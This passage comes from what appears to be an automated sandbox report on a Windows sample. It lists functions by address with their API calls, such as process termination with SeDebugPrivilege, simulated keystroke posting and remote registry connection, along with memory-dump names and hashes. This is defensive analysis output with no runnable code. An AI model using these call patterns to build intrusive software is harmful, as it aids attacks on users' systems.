                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1268354404-0
                                                                                                                                                                              • Opcode ID: be8a2616f64f2395b360b4a934cf05cf3bea585708d8dff8d859b42d843ec194
                                                                                                                                                                              • Instruction ID: 31a6346ee46e48a8bf7c8d901fc91673a603b145577123c2c52dcd3ba96c3ac3
                                                                                                                                                                              • Opcode Fuzzy Hash: be8a2616f64f2395b360b4a934cf05cf3bea585708d8dff8d859b42d843ec194
                                                                                                                                                                              • Instruction Fuzzy Hash: AE519A74600208AFDB20CF69DC86FAA3BB4BF19358F10461EF946972D0D774EC91AB55
                                                                                                                                                                              Function 004CF6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 004CF737
                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 004CF77E
                                                                                                                                                                              • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 0052EB55
                                                                                                                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0052E9A0,00000004,00000000,00000000), ref: 0052EBC1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ShowWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1268545403-0
                                                                                                                                                                              • Opcode ID: ad5c1fba246ae7535c57a86e499f63658640494596edf331735bc660de6d74fe
                                                                                                                                                                              • Instruction ID: 0053a3d6423d11c5b373c07e2ab99a8091c77f5b8a4809b6b65df31421f90174
                                                                                                                                                                              • Opcode Fuzzy Hash: ad5c1fba246ae7535c57a86e499f63658640494596edf331735bc660de6d74fe
                                                                                                                                                                              • Instruction Fuzzy Hash: 7F414E382056809ADBB44738ACC9F677EA77F56301F25082FF05B426A1C67CB84DD72A
                                                                                                                                                                              Function 004ECDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004EE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 004EE158
                                                                                                                                                                                • Part of subcall function 004EE138: GetCurrentThreadId.KERNEL32 ref: 004EE15F
                                                                                                                                                                                • Part of subcall function 004EE138: AttachThreadInput.USER32(00000000,?,004ECDFB,?,00000001), ref: 004EE166
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 004ECE06
                                                                                                                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004ECE23
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004ECE26
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 004ECE2F
                                                                                                                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004ECE4D
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004ECE50
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 004ECE59
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004ECE70
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004ECE73
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2014098862-0
                                                                                                                                                                              • Opcode ID: 38af01d8011ba52b9cf106d0f41927afc86cc0f343c11a9565068ae6da368aaa
                                                                                                                                                                              • Instruction ID: 0a9f44b2fea007afce02ee9c7856a7a0d77ae2c9535f6f6cdb01481cd27c8bda
                                                                                                                                                                              • Opcode Fuzzy Hash: 38af01d8011ba52b9cf106d0f41927afc86cc0f343c11a9565068ae6da368aaa
                                                                                                                                                                              • Instruction Fuzzy Hash: D611E1B1510618BFF7102B759C8EF6A7A3DDB28755F110416F280AB1E0C9F26C41EAB8
                                                                                                                                                                              Function 00501BFA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 308COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                                • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                                                                                                                                              • _wcstok.LIBCMT ref: 00501D6E
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 00501DFD
                                                                                                                                                                              • _memset.LIBCMT ref: 00501E30
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                                              • String ID: X$t:Vp:V
                                                                                                                                                                              • API String ID: 774024439-3188185075
                                                                                                                                                                              • Opcode ID: 1441723db7cc4a953dc4b26858e8f8928b17e135e6d640b357a7b9e34172edd7
                                                                                                                                                                              • Instruction ID: fe4aa5e030cedfff2bf78e06f33212750797675830eeb5f7343cf751b82de45c
                                                                                                                                                                              • Opcode Fuzzy Hash: 1441723db7cc4a953dc4b26858e8f8928b17e135e6d640b357a7b9e34172edd7
                                                                                                                                                                              • Instruction Fuzzy Hash: F4C182355087019FC314EF25C881A9EBBE4FF85314F00496EF89A972A2DB34ED05CBA6
                                                                                                                                                                              Function 0050C604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004EA857: CLSIDFromProgID.OLE32 ref: 004EA874
                                                                                                                                                                                • Part of subcall function 004EA857: ProgIDFromCLSID.OLE32(?,00000000), ref: 004EA88F
                                                                                                                                                                                • Part of subcall function 004EA857: lstrcmpiW.KERNEL32(?,00000000), ref: 004EA89D
                                                                                                                                                                                • Part of subcall function 004EA857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 004EA8AD
                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0050C6AD
                                                                                                                                                                              • _memset.LIBCMT ref: 0050C6BA
                                                                                                                                                                              • _memset.LIBCMT ref: 0050C7D8
                                                                                                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0050C804
                                                                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 0050C80F
                                                                                                                                                                              Strings
                                                                                                                                                                              • NULL Pointer assignment, xrefs: 0050C85D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                                              • String ID: NULL Pointer assignment
                                                                                                                                                                              • API String ID: 1300414916-2785691316
                                                                                                                                                                              • Opcode ID: 9765d8f288cd3a6b2dffbfc7f0d35f1f5ca19bdfa3cfdf435cab78622af93cbe
                                                                                                                                                                              • Instruction ID: a0d5535c139221a472084471972c21361eeadbb1e0009f097498e3478a6244fc
                                                                                                                                                                              • Opcode Fuzzy Hash: 9765d8f288cd3a6b2dffbfc7f0d35f1f5ca19bdfa3cfdf435cab78622af93cbe
                                                                                                                                                                              • Instruction Fuzzy Hash: 0C914771D00218ABDB10DFA5DC81ADEBFB9FF09710F20815AF519A7291EB705A44CFA4
                                                                                                                                                                              Function 00511AD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163processCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00511B09
                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00511B17
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 00511B45
                                                                                                                                                                                • Part of subcall function 004D297D: __wsplitpath_helper.LIBCMT ref: 004D29BD
                                                                                                                                                                              • _wcscat.LIBCMT ref: 00511B5A
                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00511BD0
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00511BE2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                              • String ID: hEV
                                                                                                                                                                              • API String ID: 1380811348-3062041611
                                                                                                                                                                              • Opcode ID: 665b3106d2bea5117e7386b02be9008a06d5988874fae6e493e70941a7469a35
                                                                                                                                                                              • Instruction ID: cb35fd348e2fc6e9e683873610fc3efbc9102df3ceaa4cabe619c8969763ff73
                                                                                                                                                                              • Opcode Fuzzy Hash: 665b3106d2bea5117e7386b02be9008a06d5988874fae6e493e70941a7469a35
                                                                                                                                                                              • Instruction Fuzzy Hash: 47519071504700AFD320DF25C885EABBBECEF88718F00495EF58597291EB74E944CBA6
                                                                                                                                                                              Function 00519882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00519926
                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 0051993A
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00519954
                                                                                                                                                                              • _wcscat.LIBCMT ref: 005199AF
                                                                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 005199C6
                                                                                                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 005199F4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window_wcscat
                                                                                                                                                                              • String ID: SysListView32
                                                                                                                                                                              • API String ID: 307300125-78025650
                                                                                                                                                                              • Opcode ID: 437ede79f787c69317d8d1972148ca2a6692cf98ac8f63e99a0ade23eebf1417
                                                                                                                                                                              • Instruction ID: a42cfaa353b1b7005338ff622e9412badb50135efc17ad9887c4338b0bf06cd5
                                                                                                                                                                              • Opcode Fuzzy Hash: 437ede79f787c69317d8d1972148ca2a6692cf98ac8f63e99a0ade23eebf1417
                                                                                                                                                                              • Instruction Fuzzy Hash: D441AE71A00308ABEF219F64C895FEE7BB8FF08354F10482AF599A7291C7759DC48B64
                                                                                                                                                                              Function 00511620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004F6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004F6F7D
                                                                                                                                                                                • Part of subcall function 004F6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004F6F8D
                                                                                                                                                                                • Part of subcall function 004F6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004F7022
                                                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051168B
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0051169E
                                                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005116CA
                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00511746
                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 00511751
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00511786
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                              • String ID: SeDebugPrivilege
                                                                                                                                                                              • API String ID: 2533919879-2896544425
                                                                                                                                                                              • Opcode ID: 006c257480e8bb0c1f19885a4f3e6f59bf11a056765bc6bf2aac27ea4327193b
                                                                                                                                                                              • Instruction ID: 1eb86ef505602ed872884391c3e33117f074b7959e4c399b8468f83a1f78c56a
                                                                                                                                                                              • Opcode Fuzzy Hash: 006c257480e8bb0c1f19885a4f3e6f59bf11a056765bc6bf2aac27ea4327193b
                                                                                                                                                                              • Instruction Fuzzy Hash: 9541AF75600201AFEB04EF55D8A1FADBBA5BF54708F08804EF6065F3D2DBB8A844CB59
                                                                                                                                                                              Function 004F6237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 004F62D6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconLoad
                                                                                                                                                                              • String ID: blank$info$question$stop$warning
                                                                                                                                                                              • API String ID: 2457776203-404129466
                                                                                                                                                                              • Opcode ID: 78449a5c8099dc1d741ca912957dea60fc8541185f4c5c43618c2e2bca983c69
                                                                                                                                                                              • Instruction ID: 292c5fe835724ebda9d3f3bdd9346cb9c4f89559db1e160efd372bede5090ffd
                                                                                                                                                                              • Opcode Fuzzy Hash: 78449a5c8099dc1d741ca912957dea60fc8541185f4c5c43618c2e2bca983c69
                                                                                                                                                                              • Instruction Fuzzy Hash: 4511A83120834ABAD7056B65DC52D7F67A8EF16724B22006FFA01673C2E7A87A41416D
                                                                                                                                                                              Function 004F757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 004F7595
                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 004F759C
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004F75B2
                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 004F75B9
                                                                                                                                                                              • _wprintf.LIBCMT ref: 004F75DF
                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004F75FD
                                                                                                                                                                              Strings
                                                                                                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 004F75DA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                              • API String ID: 3648134473-3128320259
                                                                                                                                                                              • Opcode ID: 3e52a45db354d8dfdff6611faf4ac495ffec18a6797d7f229a23850c6d5f01dd
                                                                                                                                                                              • Instruction ID: e70adbbf75480f94710d1ff2b5b56ba6fe7f08df2b2eb43dc5a6bf15eff132bf
                                                                                                                                                                              • Opcode Fuzzy Hash: 3e52a45db354d8dfdff6611faf4ac495ffec18a6797d7f229a23850c6d5f01dd
                                                                                                                                                                              • Instruction Fuzzy Hash: 1D0136F2500208BFE711A794ED89EF7777CD704305F000496B745D2151EA789E889B75
                                                                                                                                                                              Function 00512A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                                • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00512AE7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3479070676-0
                                                                                                                                                                              • Opcode ID: 33febbee618b901a45d19f8fb276d080f949bd3bbb9ae805739502d004df2457
                                                                                                                                                                              • Instruction ID: 4a1f7d5a9441ab59b68eea5d55a15ba9d706d2f4894b8ad173ccc6afb82463b7
                                                                                                                                                                              • Opcode Fuzzy Hash: 33febbee618b901a45d19f8fb276d080f949bd3bbb9ae805739502d004df2457
                                                                                                                                                                              • Instruction Fuzzy Hash: 10919B31204201AFDB00EF15C895BAEBBE5BF84318F04880EF586872A1DB74ED95DF96
                                                                                                                                                                              Function 004DB72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __mtinitlocknum.LIBCMT ref: 004DB744
                                                                                                                                                                                • Part of subcall function 004D8A0C: __FF_MSGBANNER.LIBCMT ref: 004D8A21
                                                                                                                                                                                • Part of subcall function 004D8A0C: __NMSG_WRITE.LIBCMT ref: 004D8A28
                                                                                                                                                                                • Part of subcall function 004D8A0C: __malloc_crt.LIBCMT ref: 004D8A48
                                                                                                                                                                              • __lock.LIBCMT ref: 004DB757
                                                                                                                                                                              • __lock.LIBCMT ref: 004DB7A3
                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00566948,00000018,004E6C2B,?,00000000,00000109), ref: 004DB7BF
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(8000000C,00566948,00000018,004E6C2B,?,00000000,00000109), ref: 004DB7DC
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(8000000C), ref: 004DB7EC
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1422805418-0
                                                                                                                                                                              • Opcode ID: e1c3741dcbf993de039b4a971c0e471abe769e6ae806e649c95c6541880db0c4
                                                                                                                                                                              • Instruction ID: 41dd022488ceffe05175b7e54df20c1849f86023545bcc0c741709fc003914b3
                                                                                                                                                                              • Opcode Fuzzy Hash: e1c3741dcbf993de039b4a971c0e471abe769e6ae806e649c95c6541880db0c4
                                                                                                                                                                              • Instruction Fuzzy Hash: 43413371E00205CBEB10AF69E864369B7B4EF01329F12821FF428AB3D1D77898459BD9
                                                                                                                                                                              Function 004FA1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 004FA1CE
